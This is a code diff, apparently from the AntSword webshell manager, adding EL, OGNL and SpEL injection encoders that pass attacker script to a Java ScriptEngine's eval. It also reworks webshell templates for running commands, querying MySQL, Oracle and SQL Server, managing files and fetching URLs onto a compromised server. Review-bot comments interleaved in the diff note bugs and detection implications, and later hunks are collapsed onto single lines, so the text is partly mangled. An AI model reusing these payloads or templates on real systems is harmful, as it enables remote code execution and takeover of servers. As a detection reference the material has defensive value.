diff --git a/source/core/jspjs/encoder/el.js b/source/core/jspjs/encoder/el.js
new file mode 100644
index 00000000..d720d2eb
--- /dev/null
+++ b/source/core/jspjs/encoder/el.js
@@ -0,0 +1,14 @@
+'use strict';
+
+module.exports = (pwd, data, ext = null) => {
+ let randomID;
+ if (ext.opts.otherConf['use-random-variable'] === 1) {
+ randomID = antSword.utils.RandomChoice(antSword['RANDOMWORDS']);
+ } else {
+ randomID = `${antSword['utils'].RandomLowercase()}${Math.random().toString(16).substr(2)}`;
+ }
+ data[pwd] = `\${"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval(pageContext.request.getParameter("${randomID}"))}`;
+ data[randomID]=data['_'];
+ delete data['_'];
+ return data;
+}
diff --git a/source/core/jspjs/encoder/ognl.js b/source/core/jspjs/encoder/ognl.js
new file mode 100644
index 00000000..d9748188
--- /dev/null
+++ b/source/core/jspjs/encoder/ognl.js
@@ -0,0 +1,7 @@
+'use strict';
+
+module.exports = (pwd, data, ext = null) => {
+ data[pwd] = `(new javax.script.ScriptEngineManager()).getEngineByName("js").eval(new String(@com.sun.org.apache.xml.internal.security.utils.Base64@decode('${Buffer.from(data['_']).toString('base64')}')))`;
+ delete data['_'];
+ return data;
+}
diff --git a/source/core/jspjs/encoder/spelbase64.js b/source/core/jspjs/encoder/spelbase64.js
new file mode 100644
index 00000000..ce4e2337
--- /dev/null
+++ b/source/core/jspjs/encoder/spelbase64.js
@@ -0,0 +1,7 @@
+'use strict';
+
+module.exports = (pwd, data, ext = null) => {
+ data[pwd] = `T(javax.script.ScriptEngineManager).newInstance().getEngineByName("js").eval(new String(T(com.sun.org.apache.xml.internal.security.utils.Base64).decode('${Buffer.from(data['_']).toString('base64')}')))`;
+ delete data['_'];
+ return data;
+}
diff --git a/source/core/jspjs/index.js b/source/core/jspjs/index.js
index 4cc6a204..325a2e1e 100644
--- a/source/core/jspjs/index.js
+++ b/source/core/jspjs/index.js
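Review bot: In el.js `ext` defaults to `null` but is dereferenced unconditionally on the first `if` (`ext.opts.otherConf['use-random-variable']`), so a call without the third argument throws a TypeError before anything is built. Either drop the `= null` default or guard the lookup, e.g. `if (ext && ext.opts.otherConf['use-random-variable'] === 1) {`. The function also rewrites the caller's `data` in place (adds `data[randomID]`, deletes `data['_']`) and nothing documents that contract or what `_` holds; a short JSDoc above `module.exports` stating both would help.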
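Review bot: ognl.js and spelbase64.js consist of the same three statements and differ only in the expression string assigned to `data[pwd]`, and both declare an `ext` parameter they never read. Neither file says that the function rewrites the caller's `data` in place, that `data['_']` is consumed and removed, or which expression language the string is written for. I would add a header comment to each, e.g. `// Wraps data['_'] as base64 inside an OGNL expression; mutates and returns data.` The literals `javax.script.ScriptEngineManager` and the JDK-internal Base64 class name are also what a request-inspection rule for these encoders would match on, so naming them in the comment keeps the file usable as a detection reference.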
@@ -41,7 +41,7 @@ class JSPJS extends Base { * @return {array} 编码器列表 */ get encoders() { - return []; + return ["spelbase64","el","ognl"]; } get decoders() { @@ -99,9 +99,6 @@ class JSPJS extends Base { var tag_s = "${tag_s.substr(0,tag_s.length/2)}"+"${tag_s.substr(tag_s.length/2)}"; var tag_e = "${tag_e.substr(0,tag_e.length/2)}"+"${tag_e.substr(tag_e.length/2)}"; try { - response.setContentType("text/html"); - request.setCharacterEncoding(cs); - response.setCharacterEncoding(cs); function decode(str) { str = str.substr(#randomPrefix#); var bt=Base64DecodeToByte(str); @@ -123,9 +120,12 @@ class JSPJS extends Base { } catch (e) { output.append("ERROR:// " + e.toString()); } + var result=tag_s + asenc(output.toString()) + tag_e; try { - response.getWriter().print(tag_s + asenc(output.toString()) + tag_e); - } catch (e) {} + response.getWriter().print(result); + } catch (e) { + result; + } `.replace(/\n\s+/g, '').replace(/#randomPrefix#/g, this.__opts__.otherConf["random-Prefix"]); // 使用编码器进行处理并返回 return this.encodeComplete(tag_s, tag_e, data); diff --git a/source/core/jspjs/template/command.js b/source/core/jspjs/template/command.js index 962ff8e8..b7894d5f 100644 --- a/source/core/jspjs/template/command.js +++ b/source/core/jspjs/template/command.js @@ -46,15 +46,12 @@ module.exports = (arg1, arg2, arg3) => ({ return osname.startsWith("win"); } - var cmdPath = decode(request.getParameter("${arg1}")); - var command = decode(request.getParameter("${arg2}")); - var envstr = decode(request.getParameter("${arg3}")); + var cmdPath = decode("#{newbase64::bin}"); + var command = decode("#{newbase64::cmd}"); + var envstr = decode("#{newbase64::env}"); output.append(ExecuteCommandCode(cmdPath, command, envstr)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::bin}", - [arg2]: "#{newbase64::cmd}", - [arg3]: "#{newbase64::env}", }, listcmd: { _: ` 
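Review bot: The bare `result;` in the new `catch (e)` block of the @@ -120 hunk reads as dead code and nothing explains it; presumably it is meant to make `result` the completion value of the evaluated script when `response.getWriter()` is unavailable, but that is an inference from this hunk alone. Please document the intent, and place the comment in index.js outside the template literal: the template is passed through `.replace(/\n\s+/g, '')`, so a `//` comment inside it would comment out everything after it once the newlines are stripped. The caught `e` is also discarded without being reported anywhere. The enclosing method starts above the hunk.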
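Review bot: Nothing states that the `#{newbase64::…}` values must be safe inside a double-quoted literal, yet `decode("#{newbase64::cmd}")` and its two neighbours in command.js now depend on the formatter never emitting `"`, `\` or a line break. The `arg1`–`arg3` parameters of the exported function are no longer referenced in the changed entries and look unused (the rest of the module is outside the hunk); a comment on the signature such as `// argN unused: arguments are inlined into _ via #{...} placeholders` would make that explicit. Both points apply equally to the listcmd hunk and to the mysql.js, oracle.js, sqlserver.js and filemanager.js hunks that make the same substitution. For readers using this diff as a detection reference: the operation arguments no longer arrive as separate request parameters but inside the script body, so rules keyed on the per-argument parameters need revisiting.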
@@ -71,9 +68,8 @@ module.exports = (arg1, arg2, arg3) => ({ } return ret; } - var z1 = decode(request.getParameter("${arg1}")); + var z1 = decode("#{newbase64::binarr}"); output.append(ListcmdCode(z1)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::binarr}", }, }); diff --git a/source/core/jspjs/template/database/mysql.js b/source/core/jspjs/template/database/mysql.js index fec87866..1d315d29 100644 --- a/source/core/jspjs/template/database/mysql.js +++ b/source/core/jspjs/template/database/mysql.js @@ -47,12 +47,10 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ return executeSQL(encode, conn, sql, columnsep, rowsep, false); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); output.append(showDatabases(z1, z2)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::encode}", - [arg2]: "#{newbase64::conn}", }, show_tables: { _: ` @@ -92,14 +90,11 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ return executeSQL(encode, conn, sql, columnsep, rowsep, false); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - var z3 = decode(request.getParameter("${arg3}")); + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + var z3 = decode("#{newbase64::db}"); output.append(showTables(z1, z2, z3)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::encode}", - [arg2]: "#{newbase64::conn}", - [arg3]: "#{newbase64::db}", }, show_columns: { _: ` 
@@ -139,16 +134,12 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ return executeSQL(encode, conn, sql, columnsep, rowsep, true); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - var z3 = decode(request.getParameter("${arg3}")); - var z4 = decode(request.getParameter("${arg4}")); + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + var z3 = decode("#{newbase64::db}"); + var z4 = decode("#{newbase64::table}"); output.append(showColumns(z1, z2, z3, z4)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::encode}", - [arg2]: "#{newbase64::conn}", - [arg3]: "#{newbase64::db}", - [arg4]: "#{newbase64::table}", }, query: { _: ` @@ -213,13 +204,10 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ var rowsep = "\\r\\n"; return executeSQL(encode, conn, sql, columnsep, rowsep, true); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - var z3 = decode(request.getParameter("${arg3}")); + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + var z3 = decode("#{newbase64::sql}"); output.append(query(z1, z2, z3)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::encode}", - [arg2]: "#{newbase64::conn}", - [arg3]: "#{newbase64::sql}", }, }); diff --git a/source/core/jspjs/template/database/oracle.js b/source/core/jspjs/template/database/oracle.js index 26fe9227..f460f1de 100644 --- a/source/core/jspjs/template/database/oracle.js +++ b/source/core/jspjs/template/database/oracle.js 
@@ -47,11 +47,10 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ return executeSQL(encode, conn, sql, columnsep, rowsep, false); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - output.append(showDatabases(z1, z2));`, - [arg1]: '#{newbase64::encode}', - [arg2]: '#{newbase64::conn}' + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + output.append(showDatabases(z1, z2)); + `.replace(/\n\s+/g, ""), }, show_tables: { _: ` @@ -94,13 +93,11 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ return executeSQL(encode, conn, sql, columnsep, rowsep, false); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - var z3 = decode(request.getParameter("${arg3}")); - output.append(showTables(z1, z2, z3));`, - [arg1]: '#{newbase64::encode}', - [arg2]: '#{newbase64::conn}', - [arg3]: '#{newbase64::db}' + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + var z3 = decode("#{newbase64::db}"); + output.append(showTables(z1, z2, z3)); + `.replace(/\n\s+/g, ""), }, show_columns: { _: `function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) { 
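Review bot: Stripping newlines from the oracle.js templates is only safe if every statement in them ends with `;` and none contains a `//` comment, and the `.replace(/\n\s+/g, "")` at the end of this hunk's template was not applied before this commit. Most of each template body lies outside the hunks, so that cannot be confirmed from here and is worth checking before merge. The same applies to the remaining oracle.js hunks and to all four sqlserver.js hunks, which gain the same call. A one-line comment next to the first `.replace`, e.g. `// templates are joined onto one line: terminate every statement with ';' and use no // comments`, would keep later template edits from breaking silently.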
@@ -139,15 +136,12 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ return executeSQL(encode, conn, sql, columnsep, rowsep, true); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - var z3 = decode(request.getParameter("${arg3}")); - var z4 = decode(request.getParameter("${arg4}")); - output.append(showColumns(z1, z2, z3, z4));`, - [arg1]: '#{newbase64::encode}', - [arg2]: '#{newbase64::conn}', - [arg3]: '#{newbase64::db}', - [arg4]: '#{newbase64::table}' + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + var z3 = decode("#{newbase64::db}"); + var z4 = decode("#{newbase64::table}"); + output.append(showColumns(z1, z2, z3, z4)); + `.replace(/\n\s+/g, ""), }, query: { _: ` @@ -214,13 +208,10 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ var rowsep = "\\r\\n"; return executeSQL(encode, conn, sql, columnsep, rowsep, true); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - var z3 = decode(request.getParameter("${arg3}")); - - output.append(query(z1, z2, z3));`, - [arg1]: '#{newbase64::encode}', - [arg2]: '#{newbase64::conn}', - [arg3]: '#{newbase64::sql}' + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + var z3 = decode("#{newbase64::sql}"); + output.append(query(z1, z2, z3)); + `.replace(/\n\s+/g, ""), } }) \ No newline at end of file diff --git a/source/core/jspjs/template/database/sqlserver.js b/source/core/jspjs/template/database/sqlserver.js index 8d69f6bf..3e685273 100644 --- a/source/core/jspjs/template/database/sqlserver.js +++ b/source/core/jspjs/template/database/sqlserver.js 
@@ -46,11 +46,10 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ var rowsep = ""; return executeSQL(encode, conn, sql, columnsep, rowsep, false); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - output.append(showDatabases(z1, z2));`, - [arg1]: '#{newbase64::encode}', - [arg2]: '#{newbase64::conn}' + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + output.append(showDatabases(z1, z2)); + `.replace(/\n\s+/g, ""), }, show_tables: { _: ` @@ -89,14 +88,11 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ var rowsep = ""; return executeSQL(encode, conn, sql, columnsep, rowsep, false); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - var z3 = decode(request.getParameter("${arg3}")); - - output.append(showTables(z1, z2, z3));`, - [arg1]: '#{newbase64::encode}', - [arg2]: '#{newbase64::conn}', - [arg3]: '#{newbase64::db}' + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + var z3 = decode("#{newbase64::db}"); + output.append(showTables(z1, z2, z3)); + `.replace(/\n\s+/g, ""), }, show_columns: { _: `function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) { 
@@ -134,15 +130,12 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ var sql = "SELECT TOP 1 * FROM " + dbname + "." + table; return executeSQL(encode, conn, sql, columnsep, rowsep, true); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - var z3 = decode(request.getParameter("${arg3}")); - var z4 = decode(request.getParameter("${arg4}")); - output.append(showColumns(z1, z2, z3, z4));`, - [arg1]: '#{newbase64::encode}', - [arg2]: '#{newbase64::conn}', - [arg3]: '#{newbase64::db}', - [arg4]: '#{newbase64::table}' + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + var z3 = decode("#{newbase64::db}"); + var z4 = decode("#{newbase64::table}"); + output.append(showColumns(z1, z2, z3, z4)); + `.replace(/\n\s+/g, ""), }, query: { _: ` @@ -210,13 +203,10 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ return executeSQL(encode, conn, sql, columnsep, rowsep, true); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - var z3 = decode(request.getParameter("${arg3}")); - - output.append(query(z1, z2, z3));`, - [arg1]: '#{newbase64::encode}', - [arg2]: '#{newbase64::conn}', - [arg3]: '#{newbase64::sql}' + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + var z3 = decode("#{newbase64::sql}"); + output.append(query(z1, z2, z3)); + `.replace(/\n\s+/g, ""), } }) \ No newline at end of file diff --git a/source/core/jspjs/template/filemanager.js b/source/core/jspjs/template/filemanager.js index 24e8505c..937c80f5 100644 --- a/source/core/jspjs/template/filemanager.js +++ b/source/core/jspjs/template/filemanager.js 
@@ -31,10 +31,9 @@ module.exports = (arg1, arg2, arg3) => ({ s += sF; return s; } - var dirPath=decode(request.getParameter("${arg1}")); + var dirPath=decode("#{newbase64::path}"); output.append(FileTreeCode(dirPath)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", }, delete: { @@ -53,10 +52,9 @@ module.exports = (arg1, arg2, arg3) => ({ return "1"; } - var fileOrDirPath = decode(request.getParameter("${arg1}")); + var fileOrDirPath = decode("#{newbase64::path}"); output.append(DeleteFileOrDirCode(fileOrDirPath)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", }, create_file: { @@ -87,13 +85,11 @@ module.exports = (arg1, arg2, arg3) => ({ return sb.toString(); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); + var z1 = decode("#{newbase64::path}"); + var z2 = decode("#{newbase64::content}"); output.append(WriteFileCode(z1, z2)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", - [arg2]: "#{newbase64::content}", }, read_file: { @@ -111,10 +107,9 @@ module.exports = (arg1, arg2, arg3) => ({ return s; } - var z1 = decode(request.getParameter("${arg1}")); + var z1 = decode("#{newbase64::path}"); output.append(ReadFileCode(z1)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", }, copy: { @@ -146,12 +141,10 @@ module.exports = (arg1, arg2, arg3) => ({ return "1"; } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); + var z1 = decode("#{newbase64::path}"); + var z2 = decode("#{newbase64::target}"); output.append(CopyFileOrDirCode(z1, z2)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", - [arg2]: "#{newbase64::target}", }, download_file: { 
@@ -169,10 +162,9 @@ module.exports = (arg1, arg2, arg3) => ({ os.close(); is.close(); } - var z1 = decode(request.getParameter("${arg1}")); + var z1 = decode("#{newbase64::path}"); output.append(DownloadFileCode(z1, response)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", }, upload_file: { @@ -191,12 +183,10 @@ module.exports = (arg1, arg2, arg3) => ({ os.close(); return "1"; } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); + var z1 = decode("#{newbase64::path}"); + var z2 = decode("#{buffer::content}"); output.append(UploadFileCode(z1, z2)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", - [arg2]: "#{buffer::content}", }, rename: { @@ -207,12 +197,10 @@ module.exports = (arg1, arg2, arg3) => ({ sf.renameTo(df); return "1"; } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); + var z1 = decode("#{newbase64::path}"); + var z2 = decode("#{newbase64::name}"); output.append(RenameFileOrDirCode(z1, z2)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", - [arg2]: "#{newbase64::name}", }, retime: { @@ -224,12 +212,10 @@ module.exports = (arg1, arg2, arg3) => ({ f.setLastModified(dt.getTime()); return "1"; } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); + var z1 = decode("#{newbase64::path}"); + var z2 = decode("#{newbase64::time}"); output.append(ModifyFileOrDirTimeCode(z1, z2)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", - [arg2]: "#{newbase64::time}", }, chmod: { @@ -271,11 +257,9 @@ module.exports = (arg1, arg2, arg3) => ({ } return "1"; } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); + var z1 = decode("#{newbase64::path}"); + var z2 = decode("#{newbase64::mode}"); output.append(ChmodCode(z1, z2));`.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", - [arg2]: "#{newbase64::mode}", }, mkdir: { 
@@ -285,10 +269,9 @@ module.exports = (arg1, arg2, arg3) => ({ f.mkdir(); return "1"; } - var z1 = decode(request.getParameter("${arg1}")); + var z1 = decode("#{newbase64::path}"); output.append(CreateDirCode(z1)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", }, wget: { @@ -308,11 +291,9 @@ module.exports = (arg1, arg2, arg3) => ({ h.disconnect(); return "1"; } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); + var z1 = decode("#{newbase64::url}"); + var z2 = decode("#{newbase64::path}"); output.append(WgetCode(z1, z2)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::url}", - [arg2]: "#{newbase64::path}", }, });